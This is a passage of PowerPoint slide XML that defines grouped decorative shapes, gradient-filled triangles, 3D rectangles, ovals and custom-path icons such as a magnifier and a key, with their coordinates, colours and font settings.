                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
